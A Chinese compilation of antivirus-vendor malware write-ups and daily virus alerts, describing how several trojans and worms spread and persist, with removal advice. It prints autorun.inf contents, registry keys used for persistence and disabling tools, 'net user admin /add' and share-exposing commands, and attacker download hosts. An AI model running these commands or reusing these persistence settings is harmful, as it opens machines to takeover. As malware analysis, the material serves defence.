下面是小编整理的“代理器木马变种AZU”病毒技术细节,本文共5篇,欢迎您能喜欢,也请多多分享。本文原稿由网友“胡图图什么”提供。
篇1:“代理器木马变种AZU”病毒技术细节
病毒的隐藏:
1、病毒在运行后会把自己复制到C:\\Windows目录下并把文件属性设置为隐藏,文件名随机生成,
2、修改注册表项:
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced
键值“ShowSuperHidden” = 0X00000000,修改后系统的Explorer.exe中将不显示隐藏文件,实现的简单的文件隐藏功能,这样用户将不会轻意在C:\\Windows目录下看到病毒主体。
病毒为下次运行做准备
1、每隔1秒,病毒会自动检查所有磁盘并在每个磁盘根目录下生成一个autorun.inf文件,当用我的电脑双击磁盘打开、点击磁盘自动播放或在运行中直接输入盘符进入磁盘时病毒会自动运行。
Autorun.inf文件内容如下:
[AutoRun]
pen=病毒文件名
shellexecute=病毒文件名
shell\\\\Auto\\\\command=病毒文件名
2、修改注册表HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Currentversion\\Run
键值“ctfmon.exe” = 病毒文件名
在注册表的启动项中增加一个“ctfmon.exe”键值,当系统启动时让病毒也跟随系统一同启动,
病毒的主要工作:
病毒运行后,会自动连接njhacker001.vicp.net 的IP,并且打开本机端口11111进行监听等待恶意用户进行连接。
当机器被恶意用户连接后,被感染的计算机作为代理服务器,被恶意用户使用。
安全建议:
1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级,瑞星杀毒软件每天至少升级三次。
2 使用“瑞星系统安全漏洞扫描”,打好补丁,弥补系统漏洞。
3 不浏览不良网站,不随意下载安装可疑插件。
4 不接收QQ、MSN、Emial等传来的可疑文件。
5 上网时打开杀毒软件实时监控功能。
6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中,可以有效保护密码安全。
清除办法:
瑞星杀毒软件清除办法:
安装瑞星杀毒软件,升级到19.44.10版以上,对电脑进行全盘扫描,按照软件提示进行操作,即可彻底查杀。
篇2:“VB蠕虫变种MQ”病毒技术细节
少点炒作,多搞点技术分析,也是广告,但是体现技术,多好
来源:瑞星公司
这是一个Virutal Basic编写的蠕虫病毒,用UPX加壳程序进程保护,
该病毒运行后,首先把自身复制在All User的启动文夹中更名为startup.bat并运行(如:C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动).
接着病毒还会将自身复制到多个系统目录中,路径为%Windir%,子目录名从下列路径名为随机抽取(\\system,\\web,\\fonts,\\temp,\\help)文件名在下列文件名中随机抽取(winlogon.exe,csrss.exe,
taskmgr.exe,lsass.exe,smss.exe,svchost.exe,internat.exe,spoolsv.exe,conime.exe)
病毒会将自身更名为下列三个文件名称regedit.exe,notepad.exe,msconfig.exe,并复制到%SYSTEM32%目录中,替换已经存在的正常文件(regedit.exe,msconfig.exe),并将正常的regedit.exe,msconfig.exe复制到%WinDir%目录中备用,用户在执行这三个程序的同时必定会使病毒也执行起来.
病毒会修改注册表项,达到隐藏文件的目的.
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\
Advanced“HideFileExt” = 0X00000001
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\
Advanced“Hidden” = 0X00000000
病毒会执行下列命令,使中毒计算机完全暴露在网络中,便于病毒作者进行其它的操作.
如:
cmd /c net share C$=c:\\
cmd /c net share D$=d:\\
将计算机的C盘和D盘共享.
cmd /c net user admin /add
添加一个“admin”的用户
cmd /c net localgroup administrators admin /add
将“admin”的用户加入到本地的administrators组中,得到最大的控制权
病毒遍历本地所有存储设备,向可移动存储设备中,写入病毒本身(名字改为“command.com”) 和autorun.inf.其中autorun.inf的内容为:
[autorun]
PEN=Comand.com
Shellexecute=comand.com
Shell\\explorer\\command=comand.com
病毒在遍历本地存储设备的同时,会在本地所有硬盘的根目录中复制一个和目录名相同的病毒文件,迷惑用户.
总结:这个病毒具有较大的破坏性和传播性,其文件图标为Windows系统的文件夹图标,用户非常容易受到迷惑,轻易点击该病毒.该病毒还会将用户常用的一些文件进行替换,使用户在不知不觉中,就可以中招,十分阴险.另外该病毒还可以通过移动设备进行传播.
安全建议:
1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级,瑞星杀毒软件每天至少升级三次,
2 使用“瑞星系统安全漏洞扫描”,打好补丁,弥补系统漏洞。
3 不浏览不良网站,不随意下载安装可疑插件。
4 不接收QQ、MSN、Emial等传来的可疑文件。
5 上网时打开杀毒软件实时监控功能。
6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中,可以有效保护密码安全。
清除办法:
1 . 瑞星杀毒软件清除办法:
安装瑞星杀毒软件,升级到19.19.42版以上,对电脑进行全盘扫描,按照软件提示进行操作,即可彻底查杀。
篇3:“VB邮件蠕虫变种CC”病毒技术细节
这是一个VB编写的Worm病毒,采用nspack程序进行保护,病毒文件伪装成Kingsoft AntiVirus软件,试图欺骗用户去点击运行。该病毒是集点击网站,下载病毒,利用邮件和优盘传播为一身多功能病毒。
1.病毒运行后首先会去查找c盘根目录下是否存在KAV32.exe,如果不存在将自身复制到该路径下。
2.病毒遍历本地所有存储设备,向可移动存储设备中,写入病毒本身KAV.exe和autorun.inf.其中autorun.inf的内容为: [AutoRun]open=“KAV32.exe”
3.查找OUTLook邮箱中的好友列表,然后把指定的网址ken23409.3322.org/发送给对方。
4.添加修改以下注册表项:
(1) HKEY_CLASSES_ROOT\\.reg
(默认) = TXTFILE (txtfile为默认的.txt文件打开、编辑方式,修改后将.reg文件当成.txt来处理)。
(2) HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Currentversion\\policies\\system
“disableregistrytools” = 0X00000001 (禁用注册表编辑器)
(3) HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Currentversion\\policies\\winoldapp
“disabled” = 0X00000001 (禁止在Windows下使用MS-DOS方式及其它DOS程序)
(4) HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Currentversion\\Policies\\Explorer
“nosetfolders” = 0X00000001 (从开始菜单隐藏控制面板、打印机/网络连接)
(5) HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\restrictions
“nobrowseroptions” = 0X00000001(禁用IE的“Internet选项”及其对话框中所有属性设置)
(6) HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\control panel
“homepage” = 0X00000001 (修改IE主页属性使按钮失效,用户无法更改“主页”栏)
(7) HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\control panel
“securitytab” = 0X00000001 (禁止使用IE“Internet选项”中的“安全”菜单)
(8) HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\control panel
“resetwebsettings” = 0X00000001 (隐藏网络标识)
(9) HKEY_USERS\\.Default\\Software\\Microsoft\\Internet Explorer\\Main
“start page” = HTTP://KEN23409.3322.ORG (修改IE主页为:HTTP://KEN23409.3322.ORG)
(10) HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\Currentversion\\Run
“Kav32” = C:\\KAV32.EXE (达到开机自启动目的)
5.从ken23409.3322.org:8081/muma.exe网站下载病毒文件到系统文件夹,命名为:i.exe,并运行该病毒,
(由于该网站下载连接已失效无法确认下载的是何种类型的病毒)。
6.查找以下反病毒软件窗口,找到后结束其进程:
(1).江民杀毒软件KV
(2).金山毒霸2007
(3). 瑞星杀毒软件2007
(4).卡巴斯基反病毒软件 6.0
安全建议:
1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级,瑞星杀毒软件每天至少升级三次。
2 使用“瑞星系统安全漏洞扫描”,打好补丁,弥补系统漏洞。
3 不浏览不良网站,不随意下载安装可疑插件。
4 不接收QQ、MSN、Emial等传来的可疑文件。
5 上网时打开杀毒软件实时监控功能。
6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中,可以有效保护密码安全。
清除办法:
瑞星杀毒软件清除办法:(AD开始)
安装瑞星杀毒软件,升级到19.44.32版以上,对电脑进行全盘扫描,按照软件提示进行操作,即可彻底查杀。
篇4:泡泡堂木马变种后门病毒盗帐号密码
泡泡堂木马变种后门病毒盗帐号密码
CNET中国.ZOL8月5日报道:北京信息安全测评中心、金山毒霸联合发布008月5日热门病毒,今日提醒用户特别注意以下病毒:“罗伯特”(Hack.Rbot)和“泡泡堂大盗变种gw”(Troj.WGamec.gw)
“罗伯特”(Hack.Rbot) 病毒, 可通过IRC命令控制受病毒感染的主机,
“泡泡堂大盗变种gw”(Troj.WGamec.gw)木马病毒,盗取网游“泡泡堂”用户帐号密码信息,将信息发送给病毒作者。
据瑞星全球反病毒监测网介绍,今日有一个病毒特别值得注意,它是:“麦波变种JCU(Backdoor.MyBot.jcu)”病毒。该病毒会试图利用多个微软系统漏洞进行传播,感染此病毒的计算机会被 远程控制,用户的银行卡等的账号、密码可被 窃取。
篇5:偷密码下病毒今日尤其提防木马变种
偷密码下病毒今日尤其提防木马变种
CNET中国.ZOL9月7日报道:北京信息安全测评中心、金山毒霸联合发布006年9月7日热门病毒,
今日提醒用户特别注意以下病毒:“天堂密码变种y”(wTroj.Lineage.y)和“下载者变种as”(Troj.Downloader.as)。
“天堂密码变种y”(wTroj.Lineage.y)木马病毒,是一个盗取天堂帐号的木马病毒。
“下载者变种as”(Troj.Downloader.as)木马病毒,是一个通过网络下载其它病毒程序的下载器,
另据瑞星全球反病毒监测网介绍,今日有三个病毒特别值得注意,它们是:“代理木马下载器变种LKK(Trojan.DL.Agent.lkk)”、“代理木马下载器变种LKM(Trojan.DL.Agent.lkm)”以及“MDroer释放器变种Z(Droer.MDroer.z)”病毒。“代理木马下载器变种LKK/LKM”病毒会自动将用户的IE主页锁定为一个名叫“799上网导航”或“7b网址之家”的网站,并会自动从网上下载新的变种病毒。“MDroer释放器变种Z”利用微软办公软件Word000的最新漏洞传播病毒,用户打开带有病毒的Word文档时就会自动释放其它木马病毒并运行。
